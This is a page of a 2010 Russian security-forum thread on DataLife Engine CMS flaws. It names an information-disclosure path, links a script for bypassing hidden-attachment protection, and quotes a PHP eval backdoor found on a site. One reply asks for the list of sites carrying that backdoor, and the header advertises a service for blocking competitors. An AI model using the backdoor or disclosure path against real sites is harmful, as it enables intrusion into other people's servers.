[ Обзор уязвимостей DataLife Engine ]

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей DataLife Engine ]

Страница 13 из 39

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

20.03.2010, 22:31

Alex$09

Новичок

Регистрация: 01.10.2009

Сообщений: 27

С нами: 8742028

Репутация: -2

Цитата:

Сообщение от botanig

Как просмотреть, что под хайдом в DLE?

Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки...
http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html

𝕏 Twitter Reddit Telegram Копировать ссылку

27.03.2010, 01:34

sir95

Новичок

Регистрация: 30.11.2009

Сообщений: 9

С нами: 8656400

Репутация: 0

В 8.3, может и раньшых!
вывод какие модули стоят.

Файл

http://localhost/engine/ajax/antivirus.php

Вывод список!

Защищаемся
На начало добавить

PHP код:


		
			
if(!defined('DATALIFEENGINE'))

{

  die("You lol! Anatole yzhe tut");

}

Последний раз редактировалось sir95; 27.03.2010 в 01:37..

09.04.2010, 12:00

saransko_o

Новичок

Регистрация: 01.01.2009

Сообщений: 14

С нами: 9135178

Репутация: 2

имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?

11.04.2010, 20:23

sir95

Новичок

Регистрация: 30.11.2009

Сообщений: 9

С нами: 8656400

Репутация: 0

Цитата:

Сообщение от saransko_o

Нулл движок?

11.04.2010, 23:56

saransko_o

Новичок

Регистрация: 01.01.2009

Сообщений: 14

С нами: 9135178

Репутация: 2

Цитата:

Сообщение от sir95

Нулл движок?

да. нулл от MID.

12.04.2010, 05:59

ReckouNT

Новичок

Регистрация: 16.01.2009

Сообщений: 17

С нами: 9114129

Репутация: 2

В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
Сам лично юзаю PHP - Fusion.

12.04.2010, 15:06

saransko_o

Новичок

Регистрация: 01.01.2009

Сообщений: 14

С нами: 9135178

Репутация: 2

Кстати на многих лицензия была

Последний раз редактировалось saransko_o; 12.04.2010 в 15:11..

26.04.2010, 09:17

Firrst

Новичок

Регистрация: 17.10.2009

Сообщений: 1

С нами: 8719681

Репутация: 0

Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл

30.04.2010, 05:43

Rew

Новичок

Регистрация: 12.03.2010

Сообщений: 13

С нами: 8509548

Репутация: 0

Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?

Последний раз редактировалось Rew; 30.04.2010 в 05:46..

#10

30.04.2010, 06:08

Nightmarе

Познавший АНТИЧАТ

Регистрация: 29.04.2007

Сообщений: 1,189

С нами: 10018169

Репутация: 1680

Цитата:

Сообщение от Rew

Есть бедкодер в папке /engine/ajax/

if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}

Что с этим можно сделать?

Ну например, отправить мне в ЛС список сайтов с этим бекдором

Страница 13 из 39

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор уязвимостей WordPress ]	ettee	Веб-уязвимости	383	23.11.2019 05:00
Обзор уязвимостей в платных CMS	ZAMUT	Веб-уязвимости	90	03.12.2017 01:35
DataLife Engine v.6.5. Null	Student :)	ПО для Web разработчика	31	23.02.2008 15:36
[ Обзор уязвимостей miniBB ]	-=lebed=-	Уязвимости CMS / форумов	3	12.01.2008 20:57